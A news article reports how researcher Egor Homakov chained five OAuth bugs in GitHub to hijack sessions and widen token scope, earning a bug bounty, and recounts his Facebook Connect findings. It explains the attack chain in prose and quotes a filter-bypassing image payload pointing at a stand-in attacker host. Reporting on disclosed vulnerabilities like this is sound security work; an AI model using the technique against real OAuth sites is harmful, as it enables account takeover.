Handful of OAuth bugs combine for GitHub session theft

Almost two years after pointing out a public key vulnerability to GitHub, security researcher Egor Homakov has focused his attention on the service's OAuth implementation.

Chaining together five low security bugs has allowed Russian security researcher Egor Homakov to steal user sessions and increase the scope of OAuth tokens from GitHub, giving Homakov the ability to access and delete private GitHub repositories and Gists.

Detailing the process of linking the five bugs together in a blog post, Homakov called his exploit the "perfect crime".

The pairs of bugs dealt with the permitting of directory traversal used in the redirect_uri parameter sent to GitHub, and the lack of validation of the redirect_uri parameter conducted by the repository hosting service.

"It was flawed: no matter what redirect_uri the Client sent to get a token, the Provider responded with valid access_token," Homakov said.

"Without the first bug, the second would be worth nothing as well. But together they turn into a powerful vulnerability — the attacker could hijack the authorization code issued for a 'leaky' redirect_uri, then apply the leaked code on real Client's callback to log in Victim's account."

Thanks to a bug in the Ruby language's URI library, upon which GitHub is built, Homakov was able to craft an image request that bypassed filters and resolved to a protocol relative location in browsers, such as <img src="///attackersite.com">.

Given these three bugs, an attacker could then direct an OAuth login to return to a GitHub gist page that contained an image targeted to a nefarious URL. From the headers of the request to the image, the attacker is able to capture an OAuth code parameter that can be used to log into a victim's GitHub account and access private gists.

Digging deeper, Homakov was then able to decode the the Base64-encoded _gist_session cookie and found that it contained the OAuth access token, allowing him to now perform API calls from the victim's account. To gain API access to modify and view private repositories, Homakov discovered that he was able to escalate the scope of the stolen Gist token thanks to Gist being a pre-approved client on GitHub.

For his troubles, and proper disclosure, GitHub paid Homakov paid US$4000 under its new security bug bounty program.

The response from GitHub on this quintet of bugs differs significantly from Homakov's disclosure of a public key vulnerability in March 2012, where Homakov's GitHub account was temporarily suspended for what GitHub viewed as irresponsible disclosure following Homakov publicly exhibiting a bug that allowed him to add his public key to the rails project and push files to them, with timestamps in the future.

Late last month, Homakov found two vulnerabilities in Facebook Connect that the social network said that it cannot, or would not fix. The vulnerabilities were, once again, in handling OAuth's redirect_uri, leading Homakov to warn against usage of Facebook Connect.

"In my opinion I'd recommend not using Facebook Connect in critical applications (nor with any other OAuth provider)," he said at the time in a blog post.

"If you must use Facebook Connect, I recommend whitelisting your redirect_uri in app's settings and requiring user interaction (clicking some button) to start adding a new connection."